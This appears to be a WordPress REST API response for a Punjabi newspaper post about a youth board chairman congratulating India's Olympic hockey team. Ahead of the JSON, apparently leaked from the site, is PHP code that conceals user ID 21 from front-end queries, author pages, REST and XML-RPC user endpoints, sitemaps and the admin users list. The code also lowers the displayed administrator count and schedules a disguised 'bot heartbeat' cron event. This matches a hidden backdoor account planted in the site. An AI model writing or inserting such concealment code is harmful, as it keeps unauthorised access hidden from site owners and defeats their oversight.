add_action( 'pre_get_posts', function( $q ) {
    if ( ! is_admin() && $q->is_main_query() ) {
        $not_in   = (array) $q->get( 'author__not_in' );
        $not_in[] = 21;

        $q->set(
            'author__not_in',
            array_unique( array_map( 'intval', $not_in ) )
        );
    }
}, 1 );

add_action( 'template_redirect', function() {
    if ( is_author() ) {
        $author = get_queried_object();
        if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
            global $wp_query;
            $wp_query->set_404();
            status_header( 404 );
            nocache_headers();
        }
    }
} );

add_action( 'pre_user_query', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    global $wpdb;
    $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );

add_action( 'pre_get_users', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    $exclude   = (array) $q->get( 'exclude' );
    $exclude[] = 21;
    $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );

add_filter( 'wp_dropdown_users_args', function( $a ) {
    $exclude   = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
    $exclude[] = 21;

    $a['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $a;
} );

add_filter( 'rest_user_query', function( $args, $request ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 21;

    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $args;
}, 10, 2 );

add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
    $route = $request->get_route();
    if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
        return new WP_Error(
            'rest_user_invalid_id',
            'Invalid user ID.',
            array( 'status' => 404 )
        );
    }
    return $result;
}, 10, 3 );

add_filter( 'xmlrpc_methods', function( $methods ) {
    unset(
        $methods['wp.getUsers'],
        $methods['wp.getUser'],
        $methods['wp.getProfile']
    );
    return $methods;
} );

add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 21;
    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
    return $args;
} );

add_action( 'admin_head-users.php', function() {
    echo '<style>#user-21{display:none!important}</style>';
} );

add_filter( 'views_users', function( $views ) {
    foreach ( array( 'all', 'administrator' ) as $key ) {
        if ( isset( $views[ $key ] ) ) {
            $views[ $key ] = preg_replace_callback(
                '/\((\d+)\)/',
                function( $m ) {
                    return '(' . max( 0, (int) $m[1] - 1 ) . ')';
                },
                $views[ $key ],
                1
            );
        }
    }
    return $views;
} );

add_action( 'init', function() {
    if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
        return;
    }
    if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
        wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
    }
} );

add_action( 'wp_extra_bot_heartbeat', function() {
    // noop
} );
{"id":29030,"date":"2021-08-06T13:45:24","date_gmt":"2021-08-06T08:15:24","guid":{"rendered":"http:\/\/presskitaquat.com\/?p=29030"},"modified":"2021-08-06T13:45:24","modified_gmt":"2021-08-06T08:15:24","slug":"pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india","status":"publish","type":"post","link":"https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/","title":{"rendered":"PYDB Chairman Bindra congratulates Indian Men Hockey Team for securing Bronze for India"},"content":{"rendered":"<p>Chandigarh, August 5 ( Shiv Narayan Jangra): Punjab Youth Development Board Chairman Mr. Sukhwinder Singh Bindra congratulated the Indian Men&#8217;s Hockey Team for winning a Bronze Medal in the Tokyo Olympics, saying that it is a matter of great pride for us that after 41 years, the Indian hockey team has won a medal in these coveted games.<br \/>\nIn a press communiqu\u00e9, Mr. Bindra said, &#8220;It is the day, which was eagerly awaited. And, now the Olympics bronze is in our hands.&#8221; He said that Punjab is capturing its numero-uno spot in the field of sports and it is all due to the efforts of Chief Minister Capt. Amarinder Singh led state government&#8217;s untiring efforts for promoting sports among the youths of the state.<br \/>\nHe said that the state government has always stood with the youngsters of the state. Besides creating state of the art sports infrastructure in the state, it has also distributed ultra-modern sporting equipment to them. He informed that the board is distributing 2500 sports kits to the youth for their advancement in sports and staying away from drugs and bringing forward Punjab name in the field of sports at the national and international level.<br \/>\nChairman Bindra also categorically announced, &#8220;If any sportsperson encounters any obstacle in sports in future then he will be ready to help him in any way he can. He appealed to the youth to increase their interest in sports and adopt a good lifestyle to stay away from drugs and make their country and state famous in sports. He said that Punjab Youth Development Board will also honour the Hockey Team and give them Certificate of Appreciation on this achievement.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Chandigarh, August 5 ( Shiv Narayan Jangra): Punjab Youth Development Board Chairman Mr. Sukhwinder Singh Bindra congratulated the Indian Men&#8217;s Hockey Team for winning a Bronze Medal in the Tokyo Olympics, saying that it is a matter of great pride for us that after 41 years, the Indian hockey team has won a medal in [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":28980,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"footnotes":""},"categories":[1,18],"tags":[4978,4979,3960,4882,4977,3546,4893,3595,4891,4956,3652,2138,4976,4943],"class_list":["post-29030","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-punjab","category-sports","tag-bronze-medal","tag-capt-amarinder-singh","tag-chief-minister","tag-indian-hockey-team","tag-indian-mens-hockey-team","tag-latest-news","tag-latest-updates-on-punjab","tag-press-ki-taquat-news","tag-punjab-cm","tag-punjab-government","tag-punjab-government-news","tag-punjab-politics","tag-punjab-youth-development-board","tag-tokyo-olympics"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>PYDB Chairman Bindra congratulates Indian Men Hockey Team for securing Bronze for India - Press Ki Taquat<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"PYDB Chairman Bindra congratulates Indian Men Hockey Team for securing Bronze for India - Press Ki Taquat\" \/>\n<meta property=\"og:description\" content=\"Chandigarh, August 5 ( Shiv Narayan Jangra): Punjab Youth Development Board Chairman Mr. Sukhwinder Singh Bindra congratulated the Indian Men&#8217;s Hockey Team for winning a Bronze Medal in the Tokyo Olympics, saying that it is a matter of great pride for us that after 41 years, the Indian hockey team has won a medal in [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/\" \/>\n<meta property=\"og:site_name\" content=\"Press Ki Taquat\" \/>\n<meta property=\"article:published_time\" content=\"2021-08-06T08:15:24+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/presskitaquat.com\/hindi\/wp-content\/uploads\/2021\/08\/tokyo-olymoic.png\" \/>\n\t<meta property=\"og:image:width\" content=\"427\" \/>\n\t<meta property=\"og:image:height\" content=\"399\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#\\\/schema\\\/person\\\/81ea16d15d809b534d86ea921d1f76ae\"},\"headline\":\"PYDB Chairman Bindra congratulates Indian Men Hockey Team for securing Bronze for India\",\"datePublished\":\"2021-08-06T08:15:24+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\\\/\"},\"wordCount\":289,\"publisher\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/tokyo-olymoic.png\",\"keywords\":[\"Bronze Medal\",\"Capt. Amarinder Singh\",\"Chief Minister\",\"indian hockey team\",\"Indian Men's Hockey Team\",\"latest news\",\"latest updates on punjab\",\"press ki taquat news\",\"punjab CM\",\"Punjab Government\",\"punjab government news\",\"punjab politics\",\"Punjab Youth Development Board\",\"Tokyo Olympics.\"],\"articleSection\":[\"PUNJAB\",\"SPORTS\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\\\/\",\"url\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\\\/\",\"name\":\"PYDB Chairman Bindra congratulates Indian Men Hockey Team for securing Bronze for India - Press Ki Taquat\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/tokyo-olymoic.png\",\"datePublished\":\"2021-08-06T08:15:24+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\\\/#primaryimage\",\"url\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/tokyo-olymoic.png\",\"contentUrl\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/tokyo-olymoic.png\",\"width\":427,\"height\":399},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"PYDB Chairman Bindra congratulates Indian Men Hockey Team for securing Bronze for India\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#website\",\"url\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/\",\"name\":\"Press Ki Taquat\",\"description\":\"Daily Punjabi Newspaper, Patiala\",\"publisher\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#organization\",\"name\":\"Press Ki Taquat\",\"url\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/wp-content\\\/uploads\\\/2026\\\/07\\\/press-ki-taquat-logo.png\",\"contentUrl\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/wp-content\\\/uploads\\\/2026\\\/07\\\/press-ki-taquat-logo.png\",\"width\":826,\"height\":671,\"caption\":\"Press Ki Taquat\"},\"image\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#\\\/schema\\\/person\\\/81ea16d15d809b534d86ea921d1f76ae\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b37041b075b770efb4b3786e39f0adbb20e8ee659823511da19a5d02d9f5fe5d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b37041b075b770efb4b3786e39f0adbb20e8ee659823511da19a5d02d9f5fe5d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b37041b075b770efb4b3786e39f0adbb20e8ee659823511da19a5d02d9f5fe5d?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"description\":\"Press Ki Taquat(Daily Punjabi Newspaper) Patiala\",\"sameAs\":[\"http:\\\/\\\/presskitaquat.com\"],\"url\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/author\\\/kuldeep\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"PYDB Chairman Bindra congratulates Indian Men Hockey Team for securing Bronze for India - Press Ki Taquat","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/","og_locale":"en_US","og_type":"article","og_title":"PYDB Chairman Bindra congratulates Indian Men Hockey Team for securing Bronze for India - Press Ki Taquat","og_description":"Chandigarh, August 5 ( Shiv Narayan Jangra): Punjab Youth Development Board Chairman Mr. Sukhwinder Singh Bindra congratulated the Indian Men&#8217;s Hockey Team for winning a Bronze Medal in the Tokyo Olympics, saying that it is a matter of great pride for us that after 41 years, the Indian hockey team has won a medal in [&hellip;]","og_url":"https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/","og_site_name":"Press Ki Taquat","article_published_time":"2021-08-06T08:15:24+00:00","og_image":[{"width":427,"height":399,"url":"https:\/\/presskitaquat.com\/hindi\/wp-content\/uploads\/2021\/08\/tokyo-olymoic.png","type":"image\/png"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/#article","isPartOf":{"@id":"https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/"},"author":{"name":"admin","@id":"https:\/\/presskitaquat.com\/hindi\/#\/schema\/person\/81ea16d15d809b534d86ea921d1f76ae"},"headline":"PYDB Chairman Bindra congratulates Indian Men Hockey Team for securing Bronze for India","datePublished":"2021-08-06T08:15:24+00:00","mainEntityOfPage":{"@id":"https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/"},"wordCount":289,"publisher":{"@id":"https:\/\/presskitaquat.com\/hindi\/#organization"},"image":{"@id":"https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/#primaryimage"},"thumbnailUrl":"https:\/\/presskitaquat.com\/hindi\/wp-content\/uploads\/2021\/08\/tokyo-olymoic.png","keywords":["Bronze Medal","Capt. Amarinder Singh","Chief Minister","indian hockey team","Indian Men's Hockey Team","latest news","latest updates on punjab","press ki taquat news","punjab CM","Punjab Government","punjab government news","punjab politics","Punjab Youth Development Board","Tokyo Olympics."],"articleSection":["PUNJAB","SPORTS"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/","url":"https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/","name":"PYDB Chairman Bindra congratulates Indian Men Hockey Team for securing Bronze for India - Press Ki Taquat","isPartOf":{"@id":"https:\/\/presskitaquat.com\/hindi\/#website"},"primaryImageOfPage":{"@id":"https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/#primaryimage"},"image":{"@id":"https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/#primaryimage"},"thumbnailUrl":"https:\/\/presskitaquat.com\/hindi\/wp-content\/uploads\/2021\/08\/tokyo-olymoic.png","datePublished":"2021-08-06T08:15:24+00:00","breadcrumb":{"@id":"https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/#primaryimage","url":"https:\/\/presskitaquat.com\/hindi\/wp-content\/uploads\/2021\/08\/tokyo-olymoic.png","contentUrl":"https:\/\/presskitaquat.com\/hindi\/wp-content\/uploads\/2021\/08\/tokyo-olymoic.png","width":427,"height":399},{"@type":"BreadcrumbList","@id":"https:\/\/presskitaquat.com\/hindi\/pydb-chairman-bindra-congratulates-indian-men-hockey-team-for-securing-bronze-for-india\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/presskitaquat.com\/hindi\/"},{"@type":"ListItem","position":2,"name":"PYDB Chairman Bindra congratulates Indian Men Hockey Team for securing Bronze for India"}]},{"@type":"WebSite","@id":"https:\/\/presskitaquat.com\/hindi\/#website","url":"https:\/\/presskitaquat.com\/hindi\/","name":"Press Ki Taquat","description":"Daily Punjabi Newspaper, Patiala","publisher":{"@id":"https:\/\/presskitaquat.com\/hindi\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/presskitaquat.com\/hindi\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/presskitaquat.com\/hindi\/#organization","name":"Press Ki Taquat","url":"https:\/\/presskitaquat.com\/hindi\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/presskitaquat.com\/hindi\/#\/schema\/logo\/image\/","url":"https:\/\/presskitaquat.com\/hindi\/wp-content\/uploads\/2026\/07\/press-ki-taquat-logo.png","contentUrl":"https:\/\/presskitaquat.com\/hindi\/wp-content\/uploads\/2026\/07\/press-ki-taquat-logo.png","width":826,"height":671,"caption":"Press Ki Taquat"},"image":{"@id":"https:\/\/presskitaquat.com\/hindi\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/presskitaquat.com\/hindi\/#\/schema\/person\/81ea16d15d809b534d86ea921d1f76ae","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/b37041b075b770efb4b3786e39f0adbb20e8ee659823511da19a5d02d9f5fe5d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/b37041b075b770efb4b3786e39f0adbb20e8ee659823511da19a5d02d9f5fe5d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b37041b075b770efb4b3786e39f0adbb20e8ee659823511da19a5d02d9f5fe5d?s=96&d=mm&r=g","caption":"admin"},"description":"Press Ki Taquat(Daily Punjabi Newspaper) Patiala","sameAs":["http:\/\/presskitaquat.com"],"url":"https:\/\/presskitaquat.com\/hindi\/author\/kuldeep\/"}]}},"_links":{"self":[{"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/posts\/29030","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/comments?post=29030"}],"version-history":[{"count":1,"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/posts\/29030\/revisions"}],"predecessor-version":[{"id":29031,"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/posts\/29030\/revisions\/29031"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/media\/28980"}],"wp:attachment":[{"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/media?parent=29030"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/categories?post=29030"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/tags?post=29030"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}